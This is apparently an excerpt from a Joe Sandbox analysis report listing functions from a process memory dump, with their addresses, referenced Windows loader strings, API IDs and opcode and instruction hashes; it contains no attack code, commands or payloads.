                                                                                  • Instruction ID: fc5f13f9fccb6ad310b09be5a92b3eb37166b5c94f66992c6d7e959d76501cd0
                                                                                  • Opcode Fuzzy Hash: 7ea0c4b408c4e5fe7b3a9d7735e81f98263269eeb32e00c3dda2bca0b03da68c
                                                                                  • Instruction Fuzzy Hash: D15118B1E4021DAEDF11DFA5CC88EEEBBB9FB48754F100529E911A7290E7709E05DB60
                                                                                  Function 05774C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$Flst
                                                                                  • API String ID: 0-758220159
                                                                                  • Opcode ID: 61b233f0427c70ef4def176433ad467cbe46d70784677340770d03d64eda4529
                                                                                  • Instruction ID: e67a21ca1b8b5967ccbafc82515f6fb9a199b976795c12cefb51fd09429e0714
                                                                                  • Opcode Fuzzy Hash: 61b233f0427c70ef4def176433ad467cbe46d70784677340770d03d64eda4529
                                                                                  • Instruction Fuzzy Hash: 30517FB1E002188FDF25CF95D448BB9FBF6FF44714F15842AD1499B250EB709A85DB80
                                                                                  Function 057404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0574063D
                                                                                  • kLsE, xrefs: 05740540
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  • Opcode ID: fa75e88c2575343da14ffdcdf35a53636b5302de29e1ee6e8e4a6bdb285551f6
                                                                                  • Instruction ID: edae58d7836f25e050fc1e38b8e1706a401548966a086334c464af64c5e809e5
                                                                                  • Opcode Fuzzy Hash: fa75e88c2575343da14ffdcdf35a53636b5302de29e1ee6e8e4a6bdb285551f6
                                                                                  • Instruction Fuzzy Hash: 6751AF716147429FC724EF6AC448AA7B7E9BF84300F00483EEAAA8B240E7709545DF92
                                                                                  Function 05772E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 057B280C
                                                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 057B2807
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                  • API String ID: 0-2104531740
                                                                                  • Opcode ID: 165df26e8ae83fc3e78f7f3d4dbdcb926c417d07dc2631758da3748a466be5f2
                                                                                  • Instruction ID: 495e34cffee2ad837438100600a2ec9e33a8543b401abe42243d04c63cf99e2c
                                                                                  • Opcode Fuzzy Hash: 165df26e8ae83fc3e78f7f3d4dbdcb926c417d07dc2631758da3748a466be5f2
                                                                                  • Instruction Fuzzy Hash: D541107A601205AFEB24DF55C840FAAB3A6FF94B10F20802DE9559B641E7B09C41EB94
                                                                                  Function 0574A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0574A309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0574A2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  • Opcode ID: 62b2bd975733c1368c5c6c42d1fb735bebda8c1739e2c177515d827ef5e0bade
                                                                                  • Instruction ID: 3d44058cba274bfcacf17dde64add9d3d38a8fc13333dad994738247abd9b26f
                                                                                  • Opcode Fuzzy Hash: 62b2bd975733c1368c5c6c42d1fb735bebda8c1739e2c177515d827ef5e0bade
                                                                                  • Instruction Fuzzy Hash: 3E41DE35A48659DBCB21CF69C844B6EB7B6FF85300F2441A9E802DB6A1F375D900EF40
                                                                                  Function 05780FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • @, xrefs: 05781050
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 05781025
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                  • API String ID: 0-2976085014
                                                                                  • Opcode ID: 5dcdcd9444d0d2c2ea8b993812f3844a9e5c435db63ed01dd6d1b64d286fc23f
                                                                                  • Instruction ID: 7136ab820f325bc48ed3d8f8ebab10008ec06ee3fb93a55f73545134c1aeb078
                                                                                  • Opcode Fuzzy Hash: 5dcdcd9444d0d2c2ea8b993812f3844a9e5c435db63ed01dd6d1b64d286fc23f
                                                                                  • Instruction Fuzzy Hash: 04318672A40588ABDB12EF95CC88FAFBBB9EB84750F400525E511A7250DB74DD01EBA0
                                                                                  Function 0577A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  • Opcode ID: 3345c1a6d0811f15d7177f32343049a13804680f36d1fee403b7d64661b22769
                                                                                  • Instruction ID: de7d9f931894e02be76bd071506b39f6ddf2370ed511bbcc38354dbb9a307765
                                                                                  • Opcode Fuzzy Hash: 3345c1a6d0811f15d7177f32343049a13804680f36d1fee403b7d64661b22769
                                                                                  • Instruction Fuzzy Hash: 3D01F4B2254704AFE312DF18DD4AF2A77E8EB44715F018939B948C7190E734E904EB4A
                                                                                  Function 0574C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  • Opcode ID: 79e07faf46a6e5bf9e7663c719aaa6b4f4f63950109c8f3a631bcb2b68cfaa38
                                                                                  • Instruction ID: 3fe2b98bd21169ebe5859181a04bf443db215d1a75ef2e4abc62b58f2e9f4b3f
                                                                                  • Opcode Fuzzy Hash: 79e07faf46a6e5bf9e7663c719aaa6b4f4f63950109c8f3a631bcb2b68cfaa38
                                                                                  • Instruction Fuzzy Hash: FA826975E052189FDB25CFA9C884BEDB7B6BF48310F14816AE85AAB350D7309D81EF50
                                                                                  Function 05742FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PATH
                                                                                  • API String ID: 0-1036084923
                                                                                  • Opcode ID: c3a40fd3982b49168c7742f555f968710828642b0f052e053c70cd3daf99f8ba
                                                                                  • Instruction ID: 5bb0590866e9357fed107365f8c14d6ea340bedded385f2c217e16141beb1905
                                                                                  • Opcode Fuzzy Hash: c3a40fd3982b49168c7742f555f968710828642b0f052e053c70cd3daf99f8ba
                                                                                  • Instruction Fuzzy Hash: 32F1C371E14214DBCB25DF9DD885ABEBBB1FF48700F544829E849AB250EB34A881EF51
                                                                                  Function 057DCC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: w
                                                                                  • API String ID: 0-476252946
                                                                                  • Opcode ID: 95ab823c39aec74d67856c94df691f1626a3e89db41dd0c8c229c1fac4fd7fa9
                                                                                  • Instruction ID: 59a88b321d01b1dd8a36bc4122406859c7541f4f4de5db906ff0f73b3a4adbe3
                                                                                  • Opcode Fuzzy Hash: 95ab823c39aec74d67856c94df691f1626a3e89db41dd0c8c229c1fac4fd7fa9
                                                                                  • Instruction Fuzzy Hash: 45D1CF71A04219EBCB25CF54C881ABEFBF6FF84700F548459E8999B241E335ED92E760
                                                                                  Function 057E4C34 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                  • Instruction ID: 6c44108c2edeef7ed71913607f181b8fd357bcef46060c48391e6a228523a98e
                                                                                  • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                  • Instruction Fuzzy Hash: A5A14CB1E0131AAFDF15DFA8C884EBEB7BAFF48740F184429E911A7251E7749940DB50
                                                                                  Function 057C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: af6762673ede287494ed47d7cde92f0730f4c09602965223a61351d731cda431
                                                                                  • Instruction ID: 929f65084f7ae930ec14f80118250fcb4e457bb58f125c0825487dc4d46c4041
                                                                                  • Opcode Fuzzy Hash: af6762673ede287494ed47d7cde92f0730f4c09602965223a61351d731cda431
                                                                                  • Instruction Fuzzy Hash: E2916371A40219AFDB21DF99CD89FAEBBB9EF04750F200469F601BB191D774AD04DB60
                                                                                  Function 0577A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalTags
                                                                                  • API String ID: 0-1106856819
                                                                                  • Opcode ID: b9b7d77534e21355eaaef94a48d7454b960273118f87bdc49ab80fddc9674fa6
                                                                                  • Instruction ID: 7d3413067db10d6e609a65e99c6603ccd9fcac8d8c78fdef6add352c99ec2309
                                                                                  • Opcode Fuzzy Hash: b9b7d77534e21355eaaef94a48d7454b960273118f87bdc49ab80fddc9674fa6
                                                                                  • Instruction Fuzzy Hash: 47718175E04219DFEF28CF98D590BEDBBB2BF48710F14812EE906A7240E7B19941EB50
                                                                                  Function 057E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .mui
                                                                                  • API String ID: 0-1199573805
                                                                                  • Opcode ID: 3f091d3fb58d76634606ae961aecac5dca433a5bafd2c4d94c73248aee1201e3
                                                                                  • Instruction ID: 7a30d0985a8e2730f3eef0af214c1bec2f18520d9cd8c6a7a9ef672e86b1ebec
                                                                                  • Opcode Fuzzy Hash: 3f091d3fb58d76634606ae961aecac5dca433a5bafd2c4d94c73248aee1201e3
                                                                                  • Instruction Fuzzy Hash: 605180B2E043299BCF15DF99D848AAEB7B6BF08A10F054129E911BB340D7759C01EFA4
                                                                                  Function 0575E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: EXT-
                                                                                  • API String ID: 0-1948896318
                                                                                  • Opcode ID: c71794610fd471ae1e4217e46e514d20e2e7d997cb81a38d34d1113ff2ea59fd
                                                                                  • Instruction ID: 546fbadcc7040bd1dc5c685ee7647bbdf87211c861ea95b9cd16ed6b45c36caa
                                                                                  • Opcode Fuzzy Hash: c71794610fd471ae1e4217e46e514d20e2e7d997cb81a38d34d1113ff2ea59fd
                                                                                  • Instruction Fuzzy Hash: 37418072608301AFD721DA75C848B6BB7ECAF88724F440D6DFD85D7180E6B4DA04E796
                                                                                  Function 0573CDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AlternateCodePage
                                                                                  • API String ID: 0-3889302423
                                                                                  • Opcode ID: 3e6de44bb96ecb056e982aa58f6a95ab9ff6074e3c715663d841d1bf3502d57a
                                                                                  • Instruction ID: 65310d7230b72ae688f4711c09355d78c31b1c8549c859d1e6fc6e3ec680a310
                                                                                  • Opcode Fuzzy Hash: 3e6de44bb96ecb056e982aa58f6a95ab9ff6074e3c715663d841d1bf3502d57a
                                                                                  • Instruction Fuzzy Hash: 8441D4B1E01209ABDF28DB99DC85EFEB7B9FF44720F11416AE412E7250D7709A41EB60
                                                                                  Function 057BC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryHash
                                                                                  • API String ID: 0-2202222882
                                                                                  • Opcode ID: 4a78c7a41b70ac1b60e7351ca003f7205d2ae78e47045da9f1a35cc84eaa7054
                                                                                  • Instruction ID: d792bbab980c3ddde10c06adda55dd892fdf517cbffcc4e845ce42275195cf19
                                                                                  • Opcode Fuzzy Hash: 4a78c7a41b70ac1b60e7351ca003f7205d2ae78e47045da9f1a35cc84eaa7054
                                                                                  • Instruction Fuzzy Hash: 2F4138F1D0112DABEF21DB50CC89FEE777CAB45714F0085A5E608AB140DB709E499F94
                                                                                  Function 057BCCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TrustedInstaller
                                                                                  • API String ID: 0-565535830
                                                                                  • Opcode ID: 51566a15f5ceb9d06f4c937892d8aa9a7f469adecd3f285028631b7c8071da02
                                                                                  • Instruction ID: 9db7dd2de959f486639263a490e647567fe148c2c9622a1d34334c2b0d360119
                                                                                  • Opcode Fuzzy Hash: 51566a15f5ceb9d06f4c937892d8aa9a7f469adecd3f285028631b7c8071da02
                                                                                  • Instruction Fuzzy Hash: D9316336A40619BBEB23AB94CC49FEEBB7DEB44750F054065FA00AB250D6B19D41E790
                                                                                  Function 057E0F50 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                  • Instruction ID: a1053c339456cb12621dc67f4360f04b2b6933894dc9deceed8c4224ece268bf
                                                                                  • Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                  • Instruction Fuzzy Hash: 15317EB1158345AFD311DF14C849EABBBE8FF84750F404A2EB59486290E7B0E908DB92
                                                                                  Function 057DAEB0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 057DAF2F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                  • API String ID: 0-1911121157
                                                                                  • Opcode ID: f00215221a363ca3c86f2bd8793f62b2b7c72f2fa44691e37409487fb53fc1e5
                                                                                  • Instruction ID: 4dc6cb7a9c9cfd5147132747fd4305f387253be8533449736d62057682ec5c52
                                                                                  • Opcode Fuzzy Hash: f00215221a363ca3c86f2bd8793f62b2b7c72f2fa44691e37409487fb53fc1e5
                                                                                  • Instruction Fuzzy Hash: D431F4F2A04614ABDB15DF68CC45F6AFBB5FB84B10F148665F901E7680D738E800DBA0
                                                                                  Function 05768CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: WindowsExcludedProcs
                                                                                  • API String ID: 0-3583428290
                                                                                  • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                  • Instruction ID: a51a55e199601869a35ff868885e04dc57e960fae17212e35bdd3ada3a9c66b5
                                                                                  • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                  • Instruction Fuzzy Hash: 2221F837640134ABCB229A54C848FAB77F9BF99BA0F064522BD159B114D734DD01A7B2
                                                                                  Function 057F6FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Critical error detected %lx, xrefs: 057F7027
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Critical error detected %lx
                                                                                  • API String ID: 0-802127002
                                                                                  • Opcode ID: 141cfecbe416201fff78c32a9ed1586412228e39726c5e33f3c51b27e12a13f0
                                                                                  • Instruction ID: 6508416321b076f6220c14df58bda6951032f63d046705651a097eb7bc30dd78
                                                                                  • Opcode Fuzzy Hash: 141cfecbe416201fff78c32a9ed1586412228e39726c5e33f3c51b27e12a13f0
                                                                                  • Instruction Fuzzy Hash: 12113976E143488BDB29DFA4D406BEDBBB1EB04714F20412ED556AB382D7750901DF14
                                                                                  Function 057C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 057C895E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                  • API String ID: 0-702105204
                                                                                  • Opcode ID: 8ccddbf9deea57f1c75480c811edb4f22e6a383ed0de17d1a12eda5d9452cbeb
                                                                                  • Instruction ID: 4ea2051a8490e7d705806d21f02e8a8c5fc2998844811921e7a8b713c293f289
                                                                                  • Opcode Fuzzy Hash: 8ccddbf9deea57f1c75480c811edb4f22e6a383ed0de17d1a12eda5d9452cbeb
                                                                                  • Instruction Fuzzy Hash: 6501F7713142009BD720AF55C88EA6A7F65FF81350B04049CE9861E151CF20BC40F697
                                                                                  Function 057E2000 Relevance: .8, Instructions: 757COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9d8a85178441a59ca06f64ea146ffc9deb5d9a92d8fee9b67ad9cb726ec54cb0
                                                                                  • Instruction ID: 87d9375e6ce09fee725534a2fb65e434583c0b2ed7aa6dd218fbb3ffd023a7ef
                                                                                  • Opcode Fuzzy Hash: 9d8a85178441a59ca06f64ea146ffc9deb5d9a92d8fee9b67ad9cb726ec54cb0
                                                                                  • Instruction Fuzzy Hash: A942C07A6083419FD725CF64C894A7FB7EABF8C300F08092DFA8297252D670D945EB52
                                                                                  Function 057D8158 Relevance: .6, Instructions: 617COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f7b18126abb0fd348634a099ca97eb58314f88d1fae04cbe8627d4b90b62c73
                                                                                  • Instruction ID: 6236a8114eaaf8381c32b6434fe0aa98c6689d0f16af2b7f5c9f4f2da9d2ef20
                                                                                  • Opcode Fuzzy Hash: 6f7b18126abb0fd348634a099ca97eb58314f88d1fae04cbe8627d4b90b62c73
                                                                                  • Instruction Fuzzy Hash: DD426D75E102198FDB24CF69C885BADF7F6BF48310F148199E849EB241D734A981DF61
                                                                                  Function 057EA118 Relevance: .6, Instructions: 591COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 59b13f1326f2c05b6bf8dabda03cb282df96deb21af0b6b025477f69289bba1f
                                                                                  • Instruction ID: d13c8cdcf230fc4f191f81ae3449c0a6f441e23680fe7009073cf1cf68535ec8
                                                                                  • Opcode Fuzzy Hash: 59b13f1326f2c05b6bf8dabda03cb282df96deb21af0b6b025477f69289bba1f
                                                                                  • Instruction Fuzzy Hash: A522B1742187518FDB24CF29C498772B7F2BF4A300F188499E8978F685D735D892EB61
                                                                                  Function 05768DBF Relevance: .6, Instructions: 554COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b6eae9039a4f464c731383431e3e7242f7440f4f902559538c82efb323f20c7f
                                                                                  • Instruction ID: 6fee3f20416cfe5febfab7f1efff0baeed8f9304e389fa387f7b26ab78075e73
                                                                                  • Opcode Fuzzy Hash: b6eae9039a4f464c731383431e3e7242f7440f4f902559538c82efb323f20c7f
                                                                                  • Instruction Fuzzy Hash: F0224E71E0421ADBCB25CFA5C4809BEFBF6BF88304F14815AEC45AB641E774D941EBA1
                                                                                  Function 057D892B Relevance: .4, Instructions: 386COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a24f70176c0edddeb86d0b530832684c22ba2ff1e06e5dbc127f0a6c77bbae60
                                                                                  • Instruction ID: 7fe634826599a823d2e825c1c07fa98dc0bf0cdde08a17698a550b5268e09f14
                                                                                  • Opcode Fuzzy Hash: a24f70176c0edddeb86d0b530832684c22ba2ff1e06e5dbc127f0a6c77bbae60
                                                                                  • Instruction Fuzzy Hash: 56D1F372A006198BDF05CF59C841BFEF7F2BF88304F19816AD856A7280D739E906DB61
                                                                                  Function 057465D0 Relevance: .4, Instructions: 383COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
